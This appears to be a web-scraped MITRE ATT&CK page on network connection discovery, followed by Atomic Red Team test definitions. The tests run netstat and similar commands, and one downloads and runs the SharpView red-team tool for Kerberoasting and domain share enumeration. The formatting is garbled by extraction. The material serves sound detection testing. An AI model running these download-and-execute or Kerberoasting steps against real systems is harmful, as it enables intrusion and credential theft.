Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services. Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) andlsof
can be used to list current connections.who -a
andw
can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g.show ip sockets
,show tcp brief
).(Citation: US-CERT-TA18-106A)
Atomic Test #2 - System Network Connections Discovery with PowerShell
Atomic Test #3 - System Network Connections Discovery FreeBSD, Linux & MacOS
Get a listing of network connections.
Upon successful execution, cmd.exe will execute
, 1
netstat
and 1
net use
. Results will output via stdout.1
net sessions
Supported Platforms: Windows
auto_generated_guid: 0940a971-809a-48f1-9c4d-b1d785e96ee5
1
command_prompt
!netstat
net use
net sessions
Get a listing of network connections.
Upon successful execution, powershell.exe will execute
. Results will output via stdout.1
get-NetTCPConnection
Supported Platforms: Windows
auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a
1
powershell
!1
Get-NetTCPConnection
Get a listing of network connections.
Upon successful execution, sh will execute
and 1
netstat
. Results will output via stdout.1
who -a
Supported Platforms: Linux, macOS
auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
1
sh
!1
2
netstat
who -a
1
sh
!1
if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi;
1
echo "Install netstat on the machine."; exit 1;
Get a listing of network connections, domains, domain users, and etc.
sharpview.exe located in the bin folder, an opensource red-team tool.
Upon successful execution, cmd.exe will execute sharpview.exe
Supported Platforms: Windows
auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9
| Name | Description | Type | Default Value | |——|————-|——|—————| | SharpView_url | sharpview download URL | url | https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true| | SharpView | Path of the executable opensource redteam tool used for the performing this atomic. | path | PathToAtomicsFolder\..\ExternalPayloads\SharpView.exe| | syntax | Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc. | string | “Invoke-ACLScanner”, “Invoke-Kerberoast”, “Find-DomainShare”|
1
powershell
! Elevation Required (e.g. root or admin)1
2
3
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
1
powershell
!1
if (Test-Path "#{SharpView}") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "#{SharpView}") -ErrorAction ignore | Out-Null
Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"